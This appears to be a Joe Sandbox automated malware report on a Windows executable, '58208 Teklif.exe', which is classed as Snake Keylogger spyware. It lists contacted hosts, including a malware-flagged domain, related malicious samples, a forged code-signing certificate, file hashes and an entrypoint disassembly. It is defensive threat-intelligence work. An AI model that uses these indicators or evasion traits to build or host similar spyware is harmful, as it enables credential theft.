            http://checkip.dyndns.org/q58208 Teklif.exe, 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://scratchdreams.tk58208 Teklif.exe, 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
            • 15%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            http://reallyfreegeoip.org58208 Teklif.exe, 00000003.00000002.3769706051.00000000030A2000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FC3000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003059000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000304B000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003093000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003066000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://reallyfreegeoip.org58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.00000000030A2000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003059000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FED000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000304B000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003093000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003066000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://checkip.dyndns.org58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.00000000030A2000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003059000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FED000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000304B000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003074000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003093000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003066000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://checkip.dyndns.com58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.00000000030A2000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003059000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000304B000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003093000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003066000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name58208 Teklif.exe, 00000003.00000002.3769706051.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://www.chiark.greenend.org.uk/~sgtatham/putty/058208 Teklif.exefalse
              • URL Reputation: safe
              		unknown
              https://reallyfreegeoip.org/xml/102.129.152.231$58208 Teklif.exe, 00000003.00000002.3769706051.00000000030A2000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003059000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FED000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000304B000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003093000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003066000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://scratchdreams.tk58208 Teklif.exe, 00000003.00000002.3769706051.00000000030B0000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://reallyfreegeoip.org/xml/58208 Teklif.exe, 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              104.21.67.152
              		reallyfreegeoip.orgUnited States
              		13335CLOUDFLARENETUSfalse
              172.67.169.18
              		scratchdreams.tkUnited States
              		13335CLOUDFLARENETUStrue
              193.122.130.0
              		checkip.dyndns.comUnited States
              		31898ORACLE-BMC-31898USfalse

              General Information

              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1422217
              Start date and time:2024-04-08 13:00:51 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 8m 54s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:13
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:58208 Teklif.exe
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@3/1@3/3
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 140
              • Number of non-executed functions: 57
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240000 for current running targets taking high CPU consumption

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              13:01:46API Interceptor9453012x Sleep call for process: 58208 Teklif.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              104.21.67.152Zarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                SAT8765456000.xlam.xlsxGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                  Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                      1d4D5ndo0x.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                        D09876500900000H.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                          23343100IM00270839_Dekont1.exeGet hashmaliciousSnake KeyloggerBrowse
                            Payment_Draft_confirmation.xla.xlsxGet hashmaliciousSnake KeyloggerBrowse
                              e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                proforma_Invoice_0009300_74885959969_9876.exeGet hashmaliciousSnake KeyloggerBrowse
                                  172.67.169.18Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                    1d4D5ndo0x.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                      D09876500900000H.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                        z52OURO08765.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                          SDTP098766700000.exeGet hashmaliciousSnake KeyloggerBrowse
                                            SecuriteInfo.com.Trojan.PackedNET.2725.8730.30889.exeGet hashmaliciousSnake KeyloggerBrowse
                                              vessel details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                Ship Particulars.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  SecuriteInfo.com.Trojan.PackedNET.2725.26841.22155.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    193.122.130.0Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • checkip.dyndns.org/
                                                    iCareFone.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                    • checkip.dyndns.org/
                                                    D09876500900000H.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                    • checkip.dyndns.org/
                                                    Quark Browser.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                    • checkip.dyndns.org/
                                                    Payment_Draft_confirmation.xla.xlsxGet hashmaliciousSnake KeyloggerBrowse
                                                    • checkip.dyndns.org/
                                                    e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • checkip.dyndns.org/
                                                    #U83e0#U841d#U5305#U8f7b#U5c0f#U8bf4 5.0.36.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                    • checkip.dyndns.org/
                                                    rTheRequestedReceipt.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • checkip.dyndns.org/
                                                    Ship Particulars.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • checkip.dyndns.org/
                                                    z16O865459999HY.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • checkip.dyndns.org/

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    checkip.dyndns.comZarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 193.122.6.168
                                                    VI3 Operation Guide_tech Info versionfdp.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                    • 132.226.8.169
                                                    Remittance_copy.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 132.226.247.73
                                                    SAT8765456000.xlam.xlsxGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                    • 158.101.44.242
                                                    request-2.doc.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                    • 132.226.8.169
                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 132.226.8.169
                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 158.101.44.242
                                                    Fuy2BDS9W2.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                    • 132.226.247.73
                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 132.226.247.73
                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 193.122.130.0
                                                    reallyfreegeoip.orgZarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 104.21.67.152
                                                    Remittance_copy.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 172.67.177.134
                                                    SAT8765456000.xlam.xlsxGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                    • 104.21.67.152
                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 172.67.177.134
                                                    Fuy2BDS9W2.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                    • 172.67.177.134
                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 104.21.67.152
                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 172.67.177.134
                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 104.21.67.152
                                                    109__Purchase_Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 172.67.177.134
                                                    1d4D5ndo0x.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                    • 104.21.67.152
                                                    scratchdreams.tkZarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 104.21.27.85
                                                    Remittance_copy.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 104.21.27.85
                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 104.21.27.85
                                                    Fuy2BDS9W2.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                    • 104.21.27.85
                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 104.21.27.85
                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 104.21.27.85
                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 172.67.169.18
                                                    109__Purchase_Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 104.21.27.85
                                                    1d4D5ndo0x.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                    • 172.67.169.18
                                                    FGT5000800000.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                    • 104.21.27.85

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CLOUDFLARENETUSEUR 17252,8 20240403.vbsGet hashmaliciousRemcosBrowse
                                                    • 172.67.215.45
                                                    UPS 984645.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 104.26.12.205
                                                    DHL Shipping Documents_AWB 5032675620.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 172.67.74.152
                                                    RFQ_.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                    • 104.26.12.205
                                                    UPS 095886.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 104.26.12.205
                                                    http://midjourney.coGet hashmaliciousUnknownBrowse
                                                    • 104.17.3.184
                                                    KCS20240042- cutoms clearance doc.exeGet hashmaliciousFormBookBrowse
                                                    • 104.21.78.7
                                                    PO08042024.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 104.26.13.205
                                                    test.exeGet hashmaliciousGlobeimposterBrowse
                                                    • 172.67.164.215
                                                    Purchase Order#44231.exeGet hashmaliciousFormBookBrowse
                                                    • 23.227.38.74
                                                    CLOUDFLARENETUSEUR 17252,8 20240403.vbsGet hashmaliciousRemcosBrowse
                                                    • 172.67.215.45
                                                    UPS 984645.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 104.26.12.205
                                                    DHL Shipping Documents_AWB 5032675620.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 172.67.74.152
                                                    RFQ_.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                    • 104.26.12.205
                                                    UPS 095886.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 104.26.12.205
                                                    http://midjourney.coGet hashmaliciousUnknownBrowse
                                                    • 104.17.3.184
                                                    KCS20240042- cutoms clearance doc.exeGet hashmaliciousFormBookBrowse
                                                    • 104.21.78.7
                                                    PO08042024.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 104.26.13.205
                                                    test.exeGet hashmaliciousGlobeimposterBrowse
                                                    • 172.67.164.215
                                                    Purchase Order#44231.exeGet hashmaliciousFormBookBrowse
                                                    • 23.227.38.74
                                                    ORACLE-BMC-31898USacZPG2kRsL.elfGet hashmaliciousMiraiBrowse
                                                    • 132.145.48.205
                                                    kIUmnxfdLQ.elfGet hashmaliciousMiraiBrowse
                                                    • 193.123.7.164
                                                    Zarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 193.122.6.168
                                                    https://letg.pages.dev/account/js-reporting/?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=%2Faccount%2Fchallenge%2FpasswordGet hashmaliciousHTMLPhisherBrowse
                                                    • 150.136.26.45
                                                    SAT8765456000.xlam.xlsxGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                    • 158.101.44.242
                                                    https://objectstorage.sa-saopaulo-1.oraclecloud.com/n/grnf1myuo7lg/b/bucket-20240402-0423/o/indexsmoke.htmlGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                    • 134.70.84.3
                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 158.101.44.242
                                                    mrPTE618YB.exeGet hashmaliciousPureLog StealerBrowse
                                                    • 150.136.132.149
                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 193.122.130.0
                                                    lxdriver_setup.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                    • 158.101.44.242

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    54328bd36c14bd82ddaa0c04b25ed9adZarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 104.21.67.152
                                                    VI3 Operation Guide_tech Info versionfdp.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                    • 104.21.67.152
                                                    Remittance_copy.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 104.21.67.152
                                                    file.exeGet hashmaliciousSmokeLoader, Xehook StealerBrowse
                                                    • 104.21.67.152
                                                    request-2.doc.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                    • 104.21.67.152
                                                    https://my.visme.co/view/w46vn911-northshore-tractor-ltdGet hashmaliciousUnknownBrowse
                                                    • 104.21.67.152
                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 104.21.67.152
                                                    Fuy2BDS9W2.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                    • 104.21.67.152
                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 104.21.67.152
                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 104.21.67.152
                                                    3b5074b1b5d032e5620f69f9f700ff0eProject Details_22Q7305A-N23A-01#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 172.67.169.18
                                                    EUR 17252,8 20240403.vbsGet hashmaliciousRemcosBrowse
                                                    • 172.67.169.18
                                                    UPS 984645.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 172.67.169.18
                                                    DHL Shipping Documents_AWB 5032675620.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 172.67.169.18
                                                    U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                    • 172.67.169.18
                                                    RFQ_.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                    • 172.67.169.18
                                                    58826828#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                    • 172.67.169.18
                                                    UPS 095886.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 172.67.169.18
                                                    PO08042024.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 172.67.169.18
                                                    SecuriteInfo.com.Win32.PWSX-gen.3037.8784.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 172.67.169.18

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\58208 Teklif.exe.log

                                                    Download File
                                                    Process:C:\Users\user\Desktop\58208 Teklif.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1216
                                                    Entropy (8bit):5.34331486778365
                                                    Encrypted:false
                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.284534608814056
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:58208 Teklif.exe
                                                    File size:846'344 bytes
                                                    MD5:dc59e080bc0be8cee52ec9e79ccc7e82
                                                    SHA1:22d8e9aab959c584acc896bfeed170ffa672f1cb
                                                    SHA256:95e4dd6cc5a341f4440a113e0a832175aa2f5baafd9c7483255a18088e1c2764
                                                    SHA512:7b836760ab575de13b95878a075ff8998e57433d0a7f5b2efb2bc4e3d7c4459e06af9cd71ca19f36913afde5c2b265667658542d892a61ea7f5b17f19d2484e0
                                                    SSDEEP:12288:6rLz6X60UHRoVNDWX4gpBRkZf0E5Vav8V7DcRIqlrTwimh0ndFJkTtlXkR:r67HRi4XLy90E5IUFgIqlrtnzQPC
                                                    TLSH:20054CD1F1508D9AEC6B0AF1BD2AA43025E3BE9D54A4810C559EB71B76F3342209FE1F
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0..$...........B... ...`....@.. ....................... ............@................................

                                                    File Icon

                                                    Icon Hash:aea4accc16a3d9be

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x484216
                                                    Entrypoint Section:.text
                                                    Digitally signed:true
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x660FAE9B [Fri Apr 5 07:56:11 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Authenticode Signature

                                                    Signature Valid:false
                                                    Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                    Signature Validation Error:The digital signature of the object did not verify
                                                    Error Number:-2146869232
                                                    Not Before, Not After
                                                    • 13/11/2018 01:00:00 09/11/2021 00:59:59
                                                    Subject Chain
                                                    • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                    Version:3
                                                    Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                    Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                    Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                    Serial:7C1118CBBADC95DA3752C46E47A27438

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    xor al, 38h
                                                    xor eax, 38483446h
                                                    xor al, 47h
                                                    dec eax
                                                    xor eax, 00003447h
                                                    add byte ptr [edx], dh
                                                    inc ebx
                                                    inc edx
                                                    push ebx
                                                    aaa
                                                    dec eax
                                                    xor eax, 00003439h
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x841c30x4f.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x860000x48a60.rsrc
